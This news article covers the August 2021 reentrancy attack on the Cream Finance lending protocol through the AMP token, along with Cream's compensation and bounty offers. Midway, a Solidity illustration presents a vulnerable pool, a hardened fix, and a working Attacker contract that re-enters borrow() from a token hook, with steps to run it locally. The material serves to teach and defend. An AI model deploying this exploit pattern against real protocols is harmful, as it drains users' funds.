A fresh attack on a cryptocurrency platform has again undermined the notion that crypto is inherently secure. The target was Cream Finance, which describes itself as a "decentralized lending protocol for individuals".
The attack exploited a vulnerability that let the attackers steal roughly $24 million in AMP tokens and a further $10 million or so in Ether (ETH).
According to Cream Finance, the attack took place on August 31. Later detailed analysis showed that the attackers took advantage of a reentrancy bug which stemmed from the way the AMP token's contracts and functions were used within the lending protocol: Cream's contracts handed control to the AMP token mid-transaction, and the token in turn let the attacker call back into Cream before that transaction had finished.
A detailed post on Cream Finance's website explains how the attackers managed to "nest" a second 'borrow' call inside the first and execute it before the protocol had recorded the outcome of the initial borrow. The same post states that the issue was not due to a "bug or issue" inside AMP's own code.
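To make the nested-borrow pattern concrete, the following is an added illustration in Solidity; it is not code from Cream Finance, AMP or PeckShield, and every contract, name and number in it is hypothetical. The toy token stands in for an ERC777-style token that invokes a tokensReceived hook on the recipient during a transfer (AMP follows that standard); the real ERC1820 registry lookup is omitted and the hook fires for any contract recipient. The pool uses a made-up price of 1 AMP unit per wei and a 100% collateral ratio purely for brevity. VulnerablePool records the borrower's debt only after the transfer, so a hook that calls borrow() again passes the collateral check a second and third time; HardenedPool shows the two standard fixes, checks-effects-interactions and a reentrancy lock.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.4;

// Toy ERC777-style token: a transfer to a contract invokes the recipient's
// tokensReceived() hook. Real ERC777 consults the ERC1820 registry first; that
// lookup is omitted here (hypothetical simplification).
interface IHookToken {
    function transfer(address to, uint256 amount) external returns (bool);
}

interface IHookRecipient {
    function tokensReceived(address from, uint256 amount) external;
}

contract HookToken is IHookToken {
    mapping(address => uint256) public balanceOf;

    // Unrestricted mint, for test setup only (hypothetical helper).
    function mint(address to, uint256 amount) external { balanceOf[to] += amount; }

    function transfer(address to, uint256 amount) external override returns (bool) {
        balanceOf[msg.sender] -= amount; // reverts on underflow in 0.8
        balanceOf[to] += amount;
        if (to.code.length > 0) IHookRecipient(to).tokensReceived(msg.sender, amount);
        return true;
    }
}

// Vulnerable pool: the debt is recorded only AFTER the token transfer, so the
// recipient hook runs while the first borrow is still unaccounted for.
contract VulnerablePool {
    IHookToken public immutable amp;
    mapping(address => uint256) public collateralWei;
    mapping(address => uint256) public debt;
    uint256 public constant AMP_PER_WEI = 1; // hypothetical price and 100% LTV

    constructor(IHookToken token) { amp = token; }

    function deposit() external payable { collateralWei[msg.sender] += msg.value; }

    function borrow(uint256 amount) external virtual {
        require(debt[msg.sender] + amount <= collateralWei[msg.sender] * AMP_PER_WEI, "undercollateralised");
        require(amp.transfer(msg.sender, amount), "transfer failed"); // external call: re-enters via the hook
        debt[msg.sender] += amount;                                  // state update comes too late
    }
}

// Hardened pool: checks-effects-interactions (debt recorded before the transfer)
// plus a reentrancy lock, so a nested borrow() reverts the whole transaction.
contract HardenedPool is VulnerablePool {
    uint256 private locked = 1;

    constructor(IHookToken token) VulnerablePool(token) {}

    modifier nonReentrant() {
        require(locked == 1, "reentrant call");
        locked = 2;
        _;
        locked = 1;
    }

    function borrow(uint256 amount) external override nonReentrant {
        require(debt[msg.sender] + amount <= collateralWei[msg.sender] * AMP_PER_WEI, "undercollateralised");
        debt[msg.sender] += amount;                                   // effect first
        require(amp.transfer(msg.sender, amount), "transfer failed"); // interaction last
    }
}

// Attacker: deposits collateral, borrows against all of it, and from inside the
// token hook borrows again before the first debt has been recorded.
contract Attacker is IHookRecipient {
    VulnerablePool public immutable pool;
    uint256 public reentries;

    constructor(VulnerablePool target) { pool = target; }

    function attack() external payable {
        pool.deposit{value: msg.value}();
        pool.borrow(msg.value * pool.AMP_PER_WEI());
    }

    function tokensReceived(address, uint256 amount) external override {
        if (msg.sender == address(pool.amp()) && reentries < 2) {
            reentries++;
            pool.borrow(amount); // nested borrow: the collateral check still passes
        }
    }
}
```

To run it in a local test harness, deploy HookToken, mint it at least three times the intended borrow to the pool, deploy Attacker against the pool (a HardenedPool can be passed as VulnerablePool(address(hardened))), and call attack() with 1 ether. Against VulnerablePool the attacker walks away with three borrows' worth of tokens against a single unit of collateral, and the debt is only written afterwards. Against HardenedPool the second borrow() hits the lock and reverts, unwinding the first borrow with it; even without the lock, recording the debt before the transfer makes the nested collateral check fail. The practical lesson matches Cream's own conclusion: any token whose transfer can execute recipient code is an external call, and a protocol that integrates one must treat it as such.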
After investigating the matter with the help of PeckShield, a security firm well known in blockchain security, Cream Finance found that the bug was caused by the way AMP was integrated and implemented within Cream's own platform, and Cream owned up to the issue.
Cream has also stated that it will compensate clients for any stolen tokens. The DeFi platform is also willing to let the attackers keep 10% of the stolen crypto without repercussions if they willingly return the rest. Such offers are not unusual; they resemble the sizable bug bounties many companies pay in similar circumstances, the difference being that a bounty rewards disclosure rather than a completed theft.
Cream Finance is also taking a bolder approach to punishing the attackers should they refuse to cooperate: the platform is offering a bounty of 50% of the stolen total to anyone who supplies reliable information on the attackers' identity that leads to their arrest.
ZDNet notes that this is not the first time Cream Finance has been successfully attacked. In February 2021 another attack using a different exploit led to the loss of over $37 million. Nor is it the biggest crypto theft of this kind: in early August 2021 the DeFi platform Poly Network was hit by a lone attacker who drained over half a billion dollars' worth of crypto tokens.